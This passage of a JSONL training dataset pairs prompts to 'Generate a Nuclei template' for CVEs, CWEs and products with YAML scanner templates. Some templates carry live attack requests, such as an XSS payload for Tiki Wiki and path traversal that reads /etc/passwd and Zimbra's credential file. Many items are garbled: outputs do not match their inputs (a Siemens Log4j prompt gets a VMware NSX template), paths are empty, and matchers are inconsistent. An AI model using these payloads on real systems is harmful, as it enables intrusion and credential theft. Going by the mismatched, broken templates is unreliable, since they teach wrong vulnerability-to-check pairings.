Service - Detect. Network Camera FTP service was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: networkcamera-ftp-detect\n\ninfo:\n name: Network Camera FTP Service - Detect\n author: pussycat0x\n severity: info\n description: Network Camera FTP service was detected.\n tags: network,ftp,networkcamera,detect,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "networkcamera-ftp-detect"} {"instruction": "Generate a Nuclei template for CVE-2011-4336", "input": "Title: Cross-Site Scripting (XSS) in tiki tikiwiki_cms\\/groupware\nSummary: Tiki Wiki CMS Groupware 7.0 has XSS via the GET \"ajax\" parameter to snarf_ajax.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: tiki tikiwiki_cms\\/groupware\nIndicators: error, vulnerability detected", "output": "id: CVE-2011-4336\n\ninfo:\n name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET \"ajax\" parameter to snarf_ajax.php.\n tags: cve,cve2011,seclists,xss,tikiwiki,tiki,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2011-4336"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: phpstan-config\n\ninfo:\n name: PHPStan Configuration Page - Detect\n author: DhiyaneshDK\n severity: info\n description: PHPStan configuration page was detected.\n tags: devops,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/phpstan.neon\" \n matchers:\n - type: word\n words:\n - \"parameters:\" \n - type: word\n words:\n - \"text/html\" \n - \"application/javascript\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2021-44228", "input": "Title: Vulnerability (CWE-20) in siemens 6bk1602-0aa12-0tp0_firmware and others\nSummary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: critical\nAffected Products: siemens 6bk1602-0aa12-0tp0_firmware, siemens 6bk1602-0aa22-0tp0_firmware, siemens 6bk1602-0aa32-0tp0_firmware\nIndicators: error, vulnerability detected", "output": "id: vmware-nsx-log4j-rce\n\ninfo:\n name: VMware NSX - Remote Code Execution (Apache Log4j)\n author: DhiyaneshDK\n severity: critical\n description: VMware NSX is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/login.jsp?login_error=1\" \n part: location\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: regex\n part: interactsh_request", "category": "cve", "severity": "critical", "id": "CVE-2021-44228"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: wiren-board-webui\n\ninfo:\n name: Wiren Board WebUI Panel - Detect\n author: tess\n severity: medium\n description: Wiren Board WebUI panel was detected.\n tags: panel,exposure,wiren,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/#!/dashboards\" \n matchers:\n - type: word\n words:\n - \"Wiren Board Web UI\" \n - \"accessLevel\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Pastebin API Test", "input": "Title: Pastebin API Test\nSummary: Pastebin API Test. Plain Text Storage. Tags: token-spray, pastebin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-pastebin\n\ninfo:\n name: Pastebin API Test\n author: daffainfo\n severity: info\n description: Plain Text Storage\n tags: token-spray,pastebin\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"https://pastebin.com/\" \n part: body", "category": "generic", "severity": "info", "id": "api-pastebin"} {"instruction": "Generate a Nuclei template for: VM Disk Encryption with Customer-Supplied Keys Disabled", "input": "Title: VM Disk Encryption with Customer-Supplied Keys Disabled\nSummary: VM Disk Encryption with Customer-Supplied Keys Disabled. Ensure that the disks attached to your production Google Compute Engine instances are encrypted with Customer-Supplied Encryption Keys (CSEKs) in order to have complete control over the data-at-rest encryption and decryption process, and meet strict compliance requirements.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: gcloud-vm-disk-csek-disabled\n\ninfo:\n name: VM Disk Encryption with Customer-Supplied Keys Disabled\n author: princechaddha\n severity: high\n description: Ensure that the disks attached to your production Google Compute Engine instances are encrypted with Customer-Supplied Encryption Keys (CSEKs) in order to have complete control over the data-at-rest encryption and decryption process, and meet strict compliance requirements.\n tags: cloud,devops,gcp,gcloud,compute,encryption,csek,security,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "gcloud-vm-disk-csek-disabled"} {"instruction": "Generate a Nuclei template for: Squid Analysis Report Generator", "input": "Title: Squid Analysis Report Generator\nSummary: Squid Analysis Report Generator. SARG is an open source tool that allows you to analyse the squid log files and generates beautiful reports in HTML format with information about users, IP addresses, top accessed sites, total bandwidth usage, elapsed time, downloads, access denied websites, daily reports, weekly reports and monthly reports.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: squid-analysis-report-generator\n\ninfo:\n name: Squid Analysis Report Generator\n author: geeknik\n severity: high\n description: SARG is an open source tool that allows you to analyse the squid log files and generates beautiful reports in HTML format with information about users, IP addresses, top accessed sites, total bandwidth usage, elapsed time, downloads, access denied websites, daily reports, weekly reports and monthly reports.\n tags: sarg,exposure,logs,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Squid User Access Report\" \n - \"Squid User's Access Report\" \n part: body\n condition: or\n - type: word\n words:\n - \"Daily reports\" \n - \"FILE/PERIOD\" \n part: body\n condition: or", "category": "generic", "severity": "high", "id": "squid-analysis-report-generator"} {"instruction": "Generate a Nuclei template for: Allnet - Default Login", "input": "Title: Allnet - Default Login\nSummary: Allnet - Default Login. Allnet contains a default login vulnerability. Default admin login password 'admin' was found.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: allnet-default-login\n\ninfo:\n name: Allnet - Default Login\n author: ritikchaddha\n severity: high\n description: Allnet contains a default login vulnerability. Default admin login password 'admin' was found.\n tags: default-login,allnet,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \">LOGOUT\" \n - \"REBOOT\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "allnet-default-login"} {"instruction": "Generate a Nuclei template for: Polarion Siemens Login - Panel", "input": "Title: Polarion Siemens Login - Panel\nSummary: Polarion Siemens Login - Panel. Detects the exposed Polarion Siemens login page.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: polarion-siemens-panel\n\ninfo:\n name: Polarion Siemens Login - Panel\n author: Th3l0newolf\n severity: info\n description: Detects the exposed Polarion Siemens login page.\n tags: polarion,siemens,login,panel,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/polarion/\" \n matchers:\n - type: word\n words:\n - \"Polarion AG\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "polarion-siemens-panel"} {"instruction": "Generate a Nuclei template for: Red Leaves Malware Hash - Detect", "input": "Title: Red Leaves Malware Hash - Detect\nSummary: Red Leaves Malware Hash - Detect. Red Leaves malware, related to APT10\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: red-leaves-malware-hash\n\ninfo:\n name: Red Leaves Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Red Leaves malware, related to APT10\n tags: malware,apt,red-leaves\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "red-leaves-malware-hash"} {"instruction": "Generate a Nuclei template for: Azure Websites - Cloud Enumeration", "input": "Title: Azure Websites - Cloud Enumeration\nSummary: Azure Websites - Cloud Enumeration. Searches for Azure websites that are registered and responding.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: azure-website-enum\n\ninfo:\n name: Azure Websites - Cloud Enumeration\n author: initstring\n severity: info\n description: Searches for Azure websites that are registered and responding.\n tags: cloud,enum,azure,discovery\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n condition: or", "category": "generic", "severity": "info", "id": "azure-website-enum"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: symantec-pgp-global-directory\n\ninfo:\n name: Symantec PGP Global Directory Panel - Detect\n author: princechaddha\n severity: info\n description: Symantec PGP Global Directory panel was detected.\n tags: symantec,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/vkd/GetWelcomeScreen.event\" \n matchers:\n - type: word\n words:\n - \"PGP Global Directory\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-24682", "input": "Title: Vulnerability (CWE-116) in synacor zimbra_collaboration_suite\nSummary: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document.\nVulnerability Type: Vulnerability (CWE-116)\nSeverity: medium\nAffected Products: synacor zimbra_collaboration_suite\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-24682\n\ninfo:\n name: Zimbra Collaboration Suite < 8.8.15 - Improper Encoding\n author: rxerium\n severity: medium\n description: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document.\n tags: cve,cve2022,zimbra,collaboration,xss,kev,passive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js\" \n matchers:\n - type: word\n words:\n - \"Zimbra Collaboration Suite Web Client\" \n part: body\n - type: word\n words:\n - \"application/x-javascript\" \n part: content_type\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-24682"} {"instruction": "Generate a Nuclei template for CVE-2021-40323", "input": "Title: Code Injection in cobbler_project cobbler\nSummary: Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: cobbler_project cobbler\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-40323\n\ninfo:\n name: Cobbler <3.3.0 - Remote Code Execution\n author: c-sh0\n severity: critical\n description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.\n tags: cve,cve2021,cobbler,rce,cobbler_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"text/xml\" \n part: header\n - type: regex\n condition: or\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-40323"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: django-admin-panel\n\ninfo:\n name: Python Django Admin Login Panel - Detect\n author: pdteam,righettod\n severity: info\n description: Python Django admin login panel was detected.\n tags: panel,django,python,djangoproject,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/login/\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2024-4940", "input": "Title: Vulnerability (CWE-601) in gradio_project gradio\nSummary: An open redirect vulnerability exists in the gradio-app/gradio, affecting the latest version. The vulnerability allows an attacker to redirect users to arbitrary websites, which can be exploited for phishing attacks, Cross-site Scripting (XSS), Server-Side Request Forgery (SSRF), amongst others. This issue is due to improper validation of user-supplied input in the handling of URLs. Attackers can exploit this vulnerability by crafting a malicious URL that, when processed by the application, redirects the user to an attacker-controlled web page.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: gradio_project gradio\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-4940\n\ninfo:\n name: Gradio - Open Redirect\n author: DhiyaneshDK\n severity: medium\n description: An open redirect vulnerability exists in the gradio-app/gradio, affecting the latest version. The vulnerability allows an attacker to redirect users to arbitrary websites, which can be exploited for phishing attacks, Cross-site Scripting (XSS), Server-Side Request Forgery (SSRF), amongst others. This issue is due to improper validation of user-supplied input in the handling of URLs. Attackers can exploit this vulnerability by crafting a malicious URL that, when processed by the application, redirects the user to an attacker-controlled web page.\n tags: cve,cve2024,redirect,oast,gradio,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: header\n - type: status\n status:\n - 302", "category": "cve", "severity": "medium", "id": "CVE-2024-4940"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: avayaaura-cm-panel\n\ninfo:\n name: Avaya Aura Communication Manager Login - Panel Detect\n author: princechaddha\n severity: info\n description: Avaya Aura Communication Manager login panel was detected.\n tags: panel,avaya,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/common/login/webLogin\" \n matchers:\n - type: word\n words:\n - \"Avaya Aura\" \n - \"Communication Manager (CM)\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: magnolia-default-login\n\ninfo:\n name: Magnolia CMS Default Login - Detect\n author: pussycat0x\n severity: high\n description: Magnolia CMS default login credentials were detected.\n tags: magnolia,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"changes\":\" \n - \"\"resources\":\" \n part: body_3\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header_3\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: SNMPv3 Fingerprint - Detect", "input": "Title: SNMPv3 Fingerprint - Detect\nSummary: SNMPv3 Fingerprint - Detect. SNMPv3 can leak information about the device even without proper authentication.Use `nmap -sU
-p 161 --script snmp-info` to get more information.Engine IDs can help to determine one device with multiple interfaces.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: snmpv3-detect\n\ninfo:\n name: SNMPv3 Fingerprint - Detect\n author: matejsmycka\n severity: info\n description: SNMPv3 can leak information about the device even without proper authentication.Use `nmap -sU
-p 161 --script snmp-info` to get more information.Engine IDs can help to determine one device with multiple interfaces.\n tags: js,udp,network,snmp\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "snmpv3-detect"} {"instruction": "Generate a Nuclei template for: VMware Aria Operations Login - Detect", "input": "Title: VMware Aria Operations Login - Detect\nSummary: VMware Aria Operations Login - Detect. Detects VMware Aria Operations Panel.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: vmware-aria-panel\n\ninfo:\n name: VMware Aria Operations Login - Detect\n author: rxerium\n severity: info\n description: Detects VMware Aria Operations Panel.\n tags: panel,aria,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ui/login.action\" \n matchers:\n - type: word\n words:\n - \"VMware Aria Operations\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "vmware-aria-panel"} {"instruction": "Generate a Nuclei template for CVE-2013-7091", "input": "Title: Path Traversal in synacor zimbra_collaboration_suite\nSummary: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. NOTE: this can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: synacor zimbra_collaboration_suite\nIndicators: error, vulnerability detected", "output": "id: CVE-2013-7091\n\ninfo:\n name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion\n author: rubina119\n severity: medium\n description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.\n tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00\" \n - \"{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: word\n words:\n - \"zimbra_server_hostname\" \n - \"zimbra_ldap_userdn\" \n - \"zimbra_ldap_password\" \n - \"ldap_postfix_password\" \n - \"ldap_amavis_password\" \n - \"ldap_nginx_password\" \n - \"mysql_root_password\" \n condition: or\n - type: regex", "category": "cve", "severity": "medium", "id": "CVE-2013-7091"} {"instruction": "Generate a Nuclei template for CVE-2014-9735", "input": "Title: Vulnerability (CWE-264) in themepunch showbiz_pro and others\nSummary: The ThemePunch Slider Revolution (revslider) plugin before 3.0.96 for WordPress and Showbiz Pro plugin 1.7.1 and earlier for Wordpress does not properly restrict access to administrator AJAX functionality, which allows remote attackers to (1) upload and execute arbitrary files via an update_plugin action; (2) delete arbitrary sliders via a delete_slider action; and (3) create, (4) update, (5) import, or (6) export arbitrary sliders via unspecified vectors.\nVulnerability Type: Vulnerability (CWE-264)\nSeverity: high\nAffected Products: themepunch showbiz_pro, themepunch slider_revolution\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-9735\n\ninfo:\n name: WordPress RevSlider - Remote Code Execution via File Upload\n author: iamnoooob,pdresearch\n severity: high\n description: The ThemePunch Slider Revolution (revslider) plugin before 3.0.96 for WordPress and Showbiz Pro plugin 1.7.1 and earlier for Wordpress does not properly restrict access to administrator AJAX functionality, which allows remote attackers to (1) upload and execute arbitrary files via an update_plugin action; (2) delete arbitrary sliders via a delete_slider action; and (3) create, (4) update, (5) import, or (6) export arbitrary sliders via unspecified vectors.\n tags: cve,cve2014,wordpress,revslider,fileupload,rce,plugin,wp,unauth,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2014-9735"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: quantum-scalar-detect\n\ninfo:\n name: Quantum Scalar i500 Login Panel - Detect\n author: princechaddha\n severity: info\n description: Quantum Scalar i500 login panel was detected.\n tags: panel,quantum,scalar,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-4305", "input": "Title: Unknown Vulnerability in wp-buy login_as_user_or_customer_\\(user_switching\\)\nSummary: The Login as User or Customer WordPress plugin before 3.3 lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: wp-buy login_as_user_or_customer_\\(user_switching\\)\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-4305\n\ninfo:\n name: Login as User or Customer < 3.3 - Privilege Escalation\n author: r3Y3r53\n severity: critical\n description: The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.\n tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2022-4305"} {"instruction": "Generate a Nuclei template to detect Forced Browsing", "input": "Title: Forced Browsing (CWE-425)\nSummary: The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files. Web applications susceptible to direct request attacks often make the false assumption that such resources can only be reached through a given navigation path and so only apply authorization at certain points in the path.\nVulnerability Type: Forced Browsing\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: CNVD-2020-67113\n\ninfo:\n name: H5S CONSOLE - Unauthorized Access\n author: ritikchaddha\n severity: medium\n description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.\n tags: cnvd,cnvd2020,h5s,unauth,h5sconsole,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/GetSrc\" \n - \"{{BaseURL}}/api/v1/GetDevice\" \n matchers:\n - type: word\n words:\n - \"strUser\" \n - \"strPasswd\" \n part: body\n condition: and\n - type: word\n words:\n - \"H5_AUTO\" \n - \"H5_DEV\" \n part: body\n condition: or\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-425"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: drupal-login\n\ninfo:\n name: Drupal Login Panel - Detect\n author: pathtaga\n severity: info\n description: Drupal login panel was detected.\n tags: panel,drupal,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/user/login\" \n matchers:\n - type: regex\n part: body\n condition: or\n - type: regex\n part: header\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2024-4841", "input": "Title: Vulnerability (CWE-29) in lollms lollms-webui\nSummary: A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest. By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint.\nVulnerability Type: Vulnerability (CWE-29)\nSeverity: low\nAffected Products: lollms lollms-webui\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-4841\n\ninfo:\n name: LoLLMS WebUI - Subfolder Prediction via Path Traversal\n author: s4e-io\n severity: medium\n description: A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.\n tags: cve,cve2024,lollms-webui,traversal,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "low", "id": "CVE-2024-4841"} {"instruction": "Generate a Nuclei template for: Multi-function Printer - Unauthorized Access", "input": "Title: Multi-function Printer - Unauthorized Access\nSummary: Multi-function Printer - Unauthorized Access. Unauthorized access to MFP (Multi-function printer) using eSCL protocol allows attackers to scan documents left physically in the printer and send them to an arbitrary location. Furthermore, exposure of this endpoint allows attackers to gather information about the printer, serial number, model, and possibly pull documents scanned by legitimate users.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: mfp-unauth-exposure\n\ninfo:\n name: Multi-function Printer - Unauthorized Access\n author: matejsmycka\n severity: medium\n description: Unauthorized access to MFP (Multi-function printer) using eSCL protocol allows attackers to scan documents left physically in the printer and send them to an arbitrary location. Furthermore, exposure of this endpoint allows attackers to gather information about the printer, serial number, model, and possibly pull documents scanned by legitimate users.\n tags: network,iot,printer,misconfig,escl,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/eSCL/ScannerCapabilities\" \n matchers:\n - type: word\n words:\n - \"xmlns:pwg=\" \n - \"alert(document.domain)\" \n - \"candidat\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 404", "category": "cve", "severity": "medium", "id": "CVE-2022-42747"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of 